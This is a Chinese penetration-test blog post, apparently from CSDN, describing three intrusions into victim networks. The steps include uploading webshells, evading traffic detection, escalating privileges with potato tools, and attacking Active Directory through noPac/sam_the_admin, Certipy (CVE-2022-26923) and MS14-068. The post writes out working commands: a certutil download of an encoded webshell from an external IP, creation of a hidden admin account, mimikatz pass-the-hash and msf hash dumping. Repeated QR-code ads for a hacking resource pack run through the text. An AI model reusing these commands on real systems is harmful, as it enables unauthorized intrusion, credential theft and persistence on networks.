文章目录
案例一:WEB弱口令-文件上传绕过-免杀提权-域环境
受害机器介绍:出网,无杀毒设备,有流量检测设备,有域环境。
存在用户遍历漏洞-通过弱口令爆破进入后台
个人资料头像处上传webshell
此处有一个比较好玩的点,当我连上webshell,发现是iis权限,再想上传哥斯拉的aspx的webshell,网页显示上传成功且返回路径,访问却显示404,我用冰蝎webshell也上传不上去显示哈希匹配错误。
我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~
类似如下:
这里看了一下进程虽然没有杀毒设备,但是有发现一个Ageng,推测有一个针对网络流量的检测设备,且第一次上传成功后执行了几个命令才导致它激活。当然这个网络情况通过冰蝎反弹shell到msf或CS上都是不成功的。
流量设备的简单绕过
这里也有几个思路进行了尝试分别是:
1.在服务器开启http服务,通过certutil下载base64编码的webshell
certutil -encode 1.txt base.txt
certutil -urlcache -split -f http://111.111.111.111:8000/base.txt
certutil -decode base.txt 1.aspx
这里远程下载没问题,不过执行解码为1.aspx的时候,解不出来了
2.通过echo追加写入webshell,发现每当写入危险命令文件就被删除了
后来经过测试才发现这里的的webshell绕过也很简单,在webshell内里面的内容开头添加大量的无效数据如下:
此处上传哥斯拉webshell,并使用其自带的土豆家族提权无一例成功,这里当时准备放弃了,不过想到可能是流量检测的问题,如果能将土豆家族的提权exe上传的本地执行呢?而且冰蝎没有内置GodPotato,如果是GodPotato是否能够执行成功呢?
这里不再废话,分别对这几个Potato进行了免杀绕过,果然GodPotato提权到了system权限。
域内渗透
域内信息收集
提权成功后由于没有杀毒,直接创建账户并添加到管理员组
net user admin$ 123456Aa! /add``net localgroup Administrators admin$ /add
使用刚刚的垃圾流量填充上传隧道代理neoreg,远程登录桌面一气呵成。
其中由于机器出网走代理有点卡,这里直接安装向日葵进行控制,在这里也有一个好玩的点,当我在受害机安装好向日葵后却发现怎么都点不开,后来我通过CS读取到administrator的明文密码登录上去才发现,我向日葵主页显示在administrator那里的窗口上。
使用命令 ipconfig /all 发现该机器在域环境下
administrator账户不是域账户,不过这里使用CS读取到了一个域账号且为明文密码。
登录域账户开始进行域内信息收集
下面展示一些域内信息收集命令。
net time /domain 可看域控机器名字,ping 进而获取域控IP
net user /domain 域内机器
net group "Domain Controllers" /domain 查看域控制器
net localgroup administrators /domain 查看域管理账户
certutil -config - -ping CA证书和域控机器名字
klist/klist purge 查看票据/清除票据
这里通过前期信息收集获取到域控IP为192.168.123.123 名字为(机器名+域):XXX.C.com CA证书为(域前缀+类似机器名字有的和机器名一样+CA):XX-C-CA,机器版本(Windows 10 1607/Server2016(10.0.14393)),域普通用户这里简称:user123/pass123。
此处我分别使用了CVE-2021-42287,CVE-2022-26923,MS14-068漏洞进行尝试提权均未果,依照写了不能白写的原则把过程贴下面了。
CVE-2021-42287
由于Active Directory没有对域中计算机和服务器账号进行验证,经过身份验证的攻击者利用该漏洞绕过完全限制,可将域中普通用户权限提升为域管理员权限并执行任意代码。
前提条件:一个域内普通账号 影响版本:Windows基本全系列 未打补丁KB5008380
noPac.exe scan -domain C.com -user user123 -pass pass123
noPac.exe -domain shdm.com -user user123 -pass pass123 /dc XXX.C.com /mAccount AAA /mPassword asdas1231. /service cifs /ptt``PsExec64.exe \\XXX.C.com cmd
失败
这里我不甘心又使用kali打了一次,远程主机需要配置host和代理
host配置:
192.168.123.123 C.com
192.168.123.123 C-XX-CA
192.168.123.123 XXX.C.com
python sam_the_admin.py “C/user123:pass123” -dc-ip 192.168.123.123 -shell
没有意外的利用失败了!!!
我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~
CVE-2022-26923
该漏洞允许低权限用户在安装了Active Directory证书服务(AD CS)服务器角色的默认Active Directory环境中将权限提升为域管理员。现在已经很少没有安装AD CS的大中型Active Directory环境,所以该漏洞危害和利用性都较强。
proxychains certipy account create -u user123@C.com -p pass123 -dc-ip 192.168.123.123 -user hack1 -pass hack@123 -dns 'XXX.C.com'
proxychains certipy req -u 'hack1$'@C.com -p hack@123 -target 192.168.123.123 -ca C-XX-CA -template Machine
proxychains certipy auth -pfx XXXX.pfx -dc-ip 192.168.123.123
此处前两步创建账号并给账号添加属性,申请证书都没有问题,为什么到检验证书就报错证书不匹配呢?这里也是我疑惑的点,希望有大佬能在评论区解答一下疑惑。
这里虽然也获取到了XXXX.pfx,这里我尝试使用openssl进行将pfx转换为私钥和证书
openssl pkcs12 -in xr-dc01.pfx -nodes -out test.pem
openssl rsa -in test.pem -out test.key
openssl x509 -in test.pem -out test.crt
居然需要密码寄!!!
MS14-068
goldenPac.py是被集成在impacket工具包中,用来操作kerberos的工具。goldenPac.py存放在impacket-master/examples目录中。
使用方法:
python goldenPac.py 域名称/域成员用户:域成员用户密码@域控制器地址
python goldenPac.py C.com/user123:pass123@XXX.C.com
最后域控机器没拿下,但是他各各网段没有做隔离,最后也是轻松打完满内网。
案例二:备份文件-数据库权限-提权-写入webshell-内网环境
数据库提权
开局一个url,扫描扫出来一个bin.zip。
打开后发现存在sqlserver连接地址端口以及账号密码
不是DBA权限,且权限过低无法执行命令。
这里使用SqlKnife进行提权(他里面引入了土豆家族提权非常好用),一步到位,提到了system。不过回显只能回显一行,且CS上线代码有点长,执行有语法错误。
写入webshell,上线内网
这里找到他IP下的http服务,随便在后面加了一个1报错,并报出了路径。直接写入哥斯拉webshell。
使用甜土豆提至system,并上线CS。
通过CS,直接提hash,使用mimikatz进行hash传递,进入内网。
privilege::debug
sekurlsa::pth /user:administrator /domain:192.168.1.237 /ntlm:aaaa6fa6e6c3b01347ea27bed6e327f5 "/run:mstsc.exe /restrictedadmin"
我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~
案例三:OA系统-提权-内网
通过oa上传 webshell
权限为network
通过进程识别工具,发现有如下杀软:
将会话传递到MSF上
msf执行以下命令
getsystem #尝试提升到system权限
getuid #查看当前权限
run post/windows/gather/smart_hashdump #提取哈希
这里运气比较好,直接返回system权限,并提取到了hash。
下面就是搭建隧道-远程桌面-内网渗透了,不在赘述。
网络安全学习资源分享:
给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取
👉1.成长路线图&学习规划👈
要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费。
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
👉2.网安入门到进阶视频教程👈
很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。(全套教程扫描领取哈)
👉3.SRC&黑客文档👈
大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录
SRC技术文籍:
黑客资料由于是敏感资源,这里不能直接展示哦! (全套教程扫描领取哈)
👉4.护网行动资料👈
其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
👉5.黑客必读书单👈
👉6.网络安全岗面试题合集👈
当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~
扫一扫
3501
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
